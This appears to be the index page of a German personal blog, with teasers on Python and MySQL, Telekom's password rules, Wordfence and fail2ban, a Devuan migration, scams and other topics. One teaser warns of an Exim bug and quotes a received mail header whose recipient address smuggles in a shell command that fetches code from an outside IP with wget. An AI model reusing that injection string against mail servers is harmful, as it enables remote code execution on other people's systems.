Froschs Blog

Computer und was das Leben sonst noch so zu bieten hat

Zur Website | Impressum

Python: (Fast) alles ist eine Liste

16. November 2019 um 23:11 Uhr von Atari-Frosch

„In Python ist alles eine Liste“, erklärte mir zu Beginn Bison aus dem Chaosdorf, als ich gerade anfing, Python zu lernen. An die Denkweise konnte ich mich gut gewöhnen. In den letzten Monaten ist sie mir allerdings in einem, ähm, speziellen Fall so richtig auf die Füße gefallen, und zwar im Zusammenhang mit Feldabfragen in MySQL. Heute habe ich endlich die Lösung gefunden.

Seit einiger Zeit bauen mir die Scripte aus meinem Projekt htmlglue meine statische Website zusammen. Dabei bekommt die Startseite jedes Mal ein anderes Zufallsfoto, dessen Daten aus der Datenbank meiner Media-Website gezogen werden; die Bilder selbst stehen natürlich nicht in der Datenbank, aber die Datenbank kennt den jeweiligen Pfad im Filesystem. Die Media-Website läuft unter Piwigo, und dessen Datenbank ist, wie üblich, in MySQL angelegt (ich verwende allerdings MariaDB). Und mit den zusätzlichen Informationen zu den Bildern hatte ich gelegentlich so ein kleines, größeres Problem. weiterlesen →

Die Telekom und die IT-Sicherheit

2. November 2019 um 18:07 Uhr von Atari-Frosch

Eigentlich wollte ich nur mal eben mein älteres Smartphone bzw. die darin befindliche SIM auf der Website der Telekom registrieren in der Hoffnung, dort vielleicht einstellen zu können, ob und wann meine ausgehende Nummer beim Empfänger eines Anrufs angezeigt werden soll. Derzeit wird sie nämlich nicht angezeigt, weil ich das vor vielen Jahren in einem Telekom-Laden in Mannheim mal so angegeben hatte. Am Gerät selbst kann ich das nicht einstellen, warum auch immer.

Also ging ich auf die Website und wollte mich registrieren. Als erstes sollte ich bei der Anrede zwingend zwischen „Frau“ und „Herr“ wählen. Fuck you, Telekom, nonbinary Menschen existieren. Dann kam die Wahl eines Paßworts, und ich fühlte mich ins Jahr 1998 oder so zurückversetzt: weiterlesen →

Wordfence to fail2ban

1. November 2019 um 18:50 Uhr von Atari-Frosch

Das WordPress-Plugin Wordfence ist ein weit verbreitetes Sicherheits-Plugin, um WordPress und auch dessen Clone ClassicPress vor unerwünschten Zugriffen zu schützen. Leider hat es einen Nachteil: Es kann Zugriffe nur auf Webserver-Ebene blockieren. Das heißt, auch intensive Einbruchsversuche, aggressives Crawling, oder sogar Versuche, angreifbare Plugins oder Themes etc. zu finden, hämmern trotzdem unter Umständen stunden- bis tagelang auf den Webserver ein. Und diese Angreifer können wirklich sehr aggressiv und ausdauernd sein.

Man könnte nun nach einer Mail von Wordfence, daß da mal wieder ein Host keine Ruhe gibt, diesen Host in die Firewall eintackern. Diese Einträge müßte man dann aber ständig nachhalten, denn irgendwann hören die Angriffe von einem bestimmten Host ja auch mal wieder auf, und die Firewall-Einträge möchte man ja eher knapp halten, damit die Überprüfung bei jedem Zugriff von außen nicht zu lange dauert. weiterlesen →

Öffentlicher Dienst und IT

29. Oktober 2019 um 20:52 Uhr von Atari-Frosch

Ich hab jetzt länger nix von mir hören, also, ähm, lesen lassen, weil's mir echt nicht gut ging. Aber grad hab ich was gelesen, da muß ich doch mal ein bißchen was drüber loswerden. Und zwar schreibt der Tagesspiegel: Experten warnten schon 2017: IT-Katastrophe am Berliner Kammergericht kam mit Ansage. Aua. Aua. AUA! Auhauerha!

Also erstmal: Die Software war gnadenlos veraltet. Ich meine, Windows 95!? Echt jetzt?

Mir scheint es außerdem, daß es (was mich aus meiner eigenen Erfahrung im öffentlichen Dienst jetzt so gar nicht wundern würde) keinerlei Schulungen des Personals zum Thema Datenschutz gab. Bei einem Gericht müßte da eigentlich jede Person, vom Richter bis zur Tippse, immer auf dem aktuellen Stand sein. Auch was IT-Sicherheit angeht, von Paßwörtern bis zum Transport von Daten; gerade, wenn auch zu Hause gearbeitet wird. weiterlesen →

Trojaner-Versand nach geknacktem Account

16. September 2019 um 17:48 Uhr von Atari-Frosch

Richtig gelesen: „nach“, nicht „mit“.

Ich bekam heute Vormittag eine E-Mail, die scheinbar von einer Firma kam, mit der ich bis vor ein paar Monaten gelegentlich in Kontakt stand. Scheinbar, weil die Absender-Adresse nicht dazu paßte. Die Firma hat eine eigene Domain mitsamt MX, verschickt also normalerweise auch E-Mails unter dieser eigenen Domain. Aber die Absender-Adresse dieser E-Mail war eine völlig andere.

In dieser E-Mail wurde eine E-Mail von mir an die Firma zitiert, ein typischer Vollquote, darüber stand ohne Anrede „wie besprochen, in der Anlage die angeforderte [sic!] Informationen.“ Allerdings hatte ich diese E-Mail bereits Mitte Januar geschrieben gehabt; es war die letzte Mail, die ich dorthin geschickt hatte (und die war damals auch beantwortet worden). weiterlesen →

Von Debian nach Devuan

31. August 2019 um 18:48 Uhr von Atari-Frosch

Lange geplant, endlich in Angriff genommen: Mein Wechsel von Debian zu Devuan. Versuchsweise habe ich natürlich erstmal mein Notebook, das Thinkpad R61, migriert, um zu sehen, wo ich auf Schwierigkeiten stoßen könnte, wenn ich den Desktop migriere. Und ein V-Server eines Vereins steht auch noch an. Alle drei Rechner gehen von Debian Jessie aus.

Zunächst habe ich die vorhandene Installation auf dem Thinkpad nochmal aus Debian heraus aktualisiert, weil ich da schon länger nichts mehr dran gemacht hatte. Also, „schon länger“ wie in „mehrere Monate“. Dann ging es richtig los. Um keinen zu großen Versionssprung zu machen, habe ich zunächst die Paketquellen von Devuan Jessie gewählt, das ist sozusagen deren Null-Version oder auch oldstable. Ich ging nach dieser Anleitung vor: Migrate to Devuan Jessie. Erst später stellte ich fest, daß ich auch direkt zu Devuan ASCII hätte migrieren können, aber ich glaube, mit dem Umweg über die Jessie-Version von Devuan war es sicherer. weiterlesen →

Anrede für nicht-binäre Menschen

25. August 2019 um 14:58 Uhr von Atari-Frosch

Seit ich vor etwa einem Jahr ein Gespräch mit einer durchaus gender-sensitiven Person hatte, geht mir eins nicht mehr aus dem Kopf: Wie spricht man nicht-binäre Menschen eigentlich an? „Herr/Frau“ paßt ja gerade zumindest in den meisten Fällen nicht. Und ich fühle mich mittlerweile sehr unwohl damit, mit „Frau“ angesprochen zu werden. Es ist halt nun mal falsch.

Die anfangs genannte Person fragte nämlich vor Beginn des eigentlichen Gesprächs tatsächlich nach, wie sie mich richtig ansprechen sollte, wenn die klassischen Anredeformen offensichtlich nicht zutreffen. Damals antwortete ich, tja, was das angeht, ist unsere Sprache leider ziemlich kaputt bzw. berücksichtigt nicht-binäre Menschen einfach gar nicht.

Wenn also auch der (gewählte) Vorname plus Sie-Form nicht in Frage kommen, was bleibt?

Heute morgen fiel mir eine für mich passende Form ein. Da ich frei bin von klassischen Geschlechtsrollen und das auch gleich mit der Anrede deutlich machen will, habe ich die Anrede „Freimensch“ gewählt. CC0, bedient Euch, wenn's Euch gefällt 🙂

Ich bin Freimensch Aurin Becker. (Der Nachname stört mich auch noch, aber mal sehen …)

Star Trek DS9: Melora

22. August 2019 um 22:11 Uhr von Atari-Frosch

[Spoilerwarnung] In diesem Artikel gehe ich ausführlich auf den Inhalt der Serienfolge 2.06 der Fernsehserie „Star Trek: Deep Space 9“ ein. Wer sie noch nicht gesehen hat und sich nicht spoilern lassen will, sollte diesen Artikel besser noch nicht lesen. [/Spoilerwarnung]

Vor einiger Zeit hatte ich mir die vollständige Serie „Star Trek: Deep Space 9“ auf DVD gekauft, und seit kurzem bin ich am „binge-watchen“, wie das heute heißt, wenn man versucht, eine Serie quasi am Stück durchzuschauen. Letzte Woche habe ich mit der zweiten Staffel angefangen, und da hat mich die Folge mit dem Titel „Melora“ besonders beeindruckt, obwohl sie einen durchgehenden logischen Fehler hat. Es geht in dieser Folge um den Umgang mit einer Behinderung, und zwar sowohl durch die behinderte Person als auch durch ihr Umfeld. Gedreht wurde die Folge im Jahr 1993, also vor etwa 26 Jahren. Ich habe mir die Folge wie bei mir üblich im englischen Original angesehen. weiterlesen →

Scharfe Video-Aufnahmen

13. August 2019 um 17:56 Uhr von Atari-Frosch

– nicht was Ihr wieder denkt 😉

Ich dachte gestern, für Videos von beweglichem Zeug wie fahrenden Modelleisenbahnen sollte ich zukünftig wohl doch eher die Sumikon ActionCam nehmen. Die Videoaufnahmen der Canon EOS 750D haben scheinbar keine gute Tiefenschärfe. Die Kamera verstellt deshalb dauernd das Objektiv, um die Schärfe des Hauptmotivs zu halten – und schafft's dann doch nicht immer.

Das war jedenfalls mein vorläufiges Fazit nach der Bearbeitung der ersten paar Videos, die ich an diesem Wochenende auf der FrOSCon in St. Augustin gemacht habe. Mein Motiv waren die Modelleisenbahnen des Projekts Free Your Model Train oder kurz FYMT des Vereins Freie Software Freunde, bei dem ich Mitglied bin und für den ich zusammen mit anderen Vereinsmitgliedern den Stand betreut habe. weiterlesen →

Tschö WordPress, hallo ClassicPress!

29. Juli 2019 um 17:47 Uhr von Atari-Frosch

Seit letztem Jahr schon geplant, endlich habe ich es geschafft: Den Wechsel von WordPress zum Fork ClassicPress. Schon vor längerer Zeit hatte ich einen Anlauf genommen und versucht, ein nicht mehr aktiv genutztes Blog testweise umzustellen, bevor ich an dieses hier gehe. Es funktionierte damals aber nicht; die Umstellung blieb mit einer Fehlermeldung quasi mittendrin hängen. Daher nahm ich erstmal davon Abstand, zu versuchen, auch dieses Blog umzustellen.

Der Wechsel wird durch ein Plugin bewerkstelligt, und dieses lag damals in einer Version 0.5 oder so vor. Entwickler behaupteten in ihrem Forum, der Fehler, der bei mir auftrat, sei weder bekannt noch nachvollziehbar. Also so ein Fall von „das passiert mal wieder nur mir“. weiterlesen →

Western Union und der seltsame Mailserver

27. Juli 2019 um 20:00 Uhr von Atari-Frosch

Im Nachklapp zu der Gambia-Geschichte bleibt noch etwas, was ich mal separat aufschreibe, weil es damit vermutlich nicht direkt zusammenhängt. Kurz: Entweder hat Western Union einen kaputten Mailserver oder ist undicht.

Denn nur eine halbe Stunde nach der Anmeldung bei Western Union mit einer speziell dafür angelegten Mailadresse (so'n eigener Mailserver ist ja doch für was gut) versuchte ein Host über Tage hinweg, E-Mails an genau diese Adresse einzuliefern, scheiterte jedoch an meiner Konfiguration: weiterlesen →

Gambia-Scam

27. Juli 2019 um 19:12 Uhr von Atari-Frosch

Manchmal fällt auch bei mir der Groschen nur pfennigweise. Ich wußte nicht, daß es diese Scam-Variante gibt, und hatte erst auch keine Hinweise gefunden. Erst heute, als ich die Suchbegriffe änderte. Mein Bauchgefühl war, sagen wir, indifferent – was ich seltsam fand, hätten ja auch, sagen wir, kulturelle Unterschiede gewesen sein können, und ich wollte sicher sein, mir da keine Vorurteile aufzubauen. Dabei hatte ich Verdachtsmomente gehabt. Allerdings ging es mir in den letzten Wochen auch nicht gut, meine Konzentration war tageweise ziemlich im Eimer. Das mag auch eine Rolle gespielt haben. – OK, von vorn.

Ich bin auf einen Scam hereingefallen, und ich erzähle Euch das ausführlich, damit es Euch nicht auch passiert. Es fing harmlos an: Ein Account mit dem Twitter-Handle @Modoulamindram3 folgte meinem. Nichts Ungewöhnliches. Ungewöhnlich war die Herkunft: Gambia, Westafrika. Das war am 24. Mai gewesen. Ich wurde neugierig und folgte zurück. Allerdings war mir durchaus aufgefallen, daß der Account bis zu diesem Zeitpunkt ganze 10 Tweets abgesetzt hatte, die direkt an andere Accounts gerichtet waren und meistens aus Smalltalk bestanden, also „wie geht es Dir“ oder „wie ist das Wetter bei Dir“. weiterlesen →

Zitat des Tages: „Falschparker“

26. Juli 2019 um 14:28 Uhr von Atari-Frosch

Der WDR hatte über Schwierigkeiten der Düsseldorfer Feuerwehr berichtet, an „Falschparkern“ (also: Brutalparkern) vorbeizukommen:


weiterlesen →

Achtung, Exim-Bug unterwegs!

20. Juni 2019 um 16:51 Uhr von Atari-Frosch

Gestern erhielt ich zwei … „interessante“ E-Mails an den root-Account meines Servers. Der Body war jeweils leer. Der Header sieht so aus:

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Received: from service.com (flamingw.arvixecloud.com [108.175.157.131])
        by mail.atari-frosch.de (Postfix) with SMTP id B61EAC9E8;
        Wed, 19 Jun 2019 16:58:45 +0200 (CEST)

Darunter folgten noch 31 Received-Zeilen, die jedoch nur jeweils die Zahlen von 1 bis 31 enthielten. Die To:-Zeile ist dabei das Spannende: weiterlesen →

Altersrente, LOL

8. Juni 2019 um 18:07 Uhr von Atari-Frosch

Immer wenn es um die Rente geht, höre ich – auch und gerade von der SPD – solche Sätze wie „wenn man 35 Jahre lang gearbeitet hat, muß man eine auskömmliche Rente bekommen“ oder überhaupt die Sprüche von der harten Arbeit und so. Und jedesmal denke ich mir: Also erstens meint Ihr Einkommen, nicht Arbeit. Denn darauf, ob eins (abhängig, bezahlt – alles andere zählt ja nicht) gearbeitet hat, kommt es ja schon lang nicht mehr an, sondern darauf, wieviel eins verdienen durfte.

Und zweitens: Brauchen die, die das mit der Erzeugung von Einkommen nicht hinbekommen haben, aus welchen Gründen auch immer, im Alter nix? Oder wird gleich davon ausgegangen, daß einkommensarme und -lose Menschen gefälligst gar nicht so alt werden sollen, daß sie genügend hohe Rentenansprüche haben könnten?

Oury hat dazu heute einen Tweet verfaßt: weiterlesen →